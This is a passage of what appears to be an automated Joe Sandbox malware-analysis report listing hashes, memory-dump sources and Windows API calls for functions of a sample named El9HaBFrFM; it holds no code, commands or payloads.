                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8a0beec4657a7815b19838cc710d74aa1cf712b9ed1eef60bf7f5b2b335f6cec
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5513721B09B41A6FB289E2D948467A6293BF46BA4F884770EF7DC77D5CE3CE5008700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2e12372404bb75e630f27f2dcab915c789a23ffa6ebb811527d2b191df68c771
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66110162708B9181DA208B29A804169A362AB49FF4F984371EFBDCB7E9CF7CD4518700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00007FF6BA3BA9D5,?,?,00000000,00007FF6BA3BAA8A), ref: 00007FF6BA3BABC6
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6BA3BA9D5,?,?,00000000,00007FF6BA3BAA8A), ref: 00007FF6BA3BABD0
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 918212764-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                                                                                                        • Instruction ID: c4c863d9a9f2aa53c30544939d376d09e66ce796af34c7608f5e543c0549db74
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68219321F18E8283FEA49769949537D16839F887A4FC843B9DF2EC77D2DE6CA4854300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2d5e62faf8d087b7a2871d42b9125e7fedfc88b4f3c558eacc28176e6673b9ec
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A641C132919A4587EA349F2DA64127977A2EB55B81F900372EF8EC37D1CF6CE402CB51
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _fread_nolock
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 840049012-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: d1cf0969546e67d8c79be56f924a5aafafb037098b6e94a4944dfbd08bf1f1e7
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5b03a73843d6e72cb3d511d342e393f99775f96de53e1b95dd61511d0c8ca11b
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d1cf0969546e67d8c79be56f924a5aafafb037098b6e94a4944dfbd08bf1f1e7
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0221A321B18A6256FE50DA2AA9043BEE652BF45BC4F8844B0EF0DC7786DE7DE046C300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 561f36ce20f8d9876c061068123aba0c8bd1c0d51e69060b0fd72c9c26a91bd8
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22315E32A18E1285EA516F5D884137C3A92AF84B94FC103B5EF5DC73D2CEBCA4418715
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 9f4c7147dfa47939fd776ed0faefe9f973fa16268f0bc98a83545da7d521671b
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44117531E1CE4182FAA09F5994001BDA666BF85B84FC44672EF4DD7B96CF3DD4008700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0b51025a930cd07badc35c3cc97dbc5f21194d3d47be7299de1440cbcf87ece4
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D219232A18B8186DB618F1CD8413797AA1FB84B54F545234EF5DC76D9EF3CD4518B00
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8603938ac5e1fbf28ba7d9b8f40a04eb8b77d7e104ff7c3c46d49aacb8bdd123
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 91fde6fb4607b3be07ad295b73ce13d16f6da0e5e7903db2d88e7a8e2f6de61b
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8603938ac5e1fbf28ba7d9b8f40a04eb8b77d7e104ff7c3c46d49aacb8bdd123
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E21C232B0C25289E76C9A35A861A7D32A0FF10B95F9C84B5DE6D422D9DE38E841C661
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 422d9f1954e68c8f767eb45eda4488e6bd0fc683700c8d32fe1718e3f714c45c
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29018821B08F4541E904DF5A99421A9AA96FF86FE0F8847B1DF5CD7BD6DE3CD5014700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6BA3A45F4,00000000,00007FF6BA3A1985), ref: 00007FF6BA3A93C9
                                                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00007FF6BA3A6476,?,00007FF6BA3A336E), ref: 00007FF6BA3A8EA2
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 2592636585-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                                                                                                                        • Instruction ID: a6826ed24978e6d76db2d190bb51fbe167198417bb337adff57f68617654cf46
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2AD0CD11F3465541EE44A76BB95663952525F89BC0F88C075EF4D83749EC3CC0414700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 75b20169d53ea6e9adb4d5144008c144a742f0770ca676f6ecbafb463341fae2
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D21A432B0878086D7589B22A550A6EB3A5FB84BC4F144036EB9D43F99CF3CD456CB00
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
                                                                                                                                                                                                                                                                                                                        • Instruction ID: e72d552114e007bd1472c9735df93af6e7c99fd6864afc518a21d36c8c0dc9bf
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A321A431F0C25289F76CAA359460A7932D0FF11B95FACC4B1ED2D466DDCE3CE8418661
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,00000000,00007FF6BA3BB32A,?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A), ref: 00007FF6BA3BEBED
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: AllocHeap
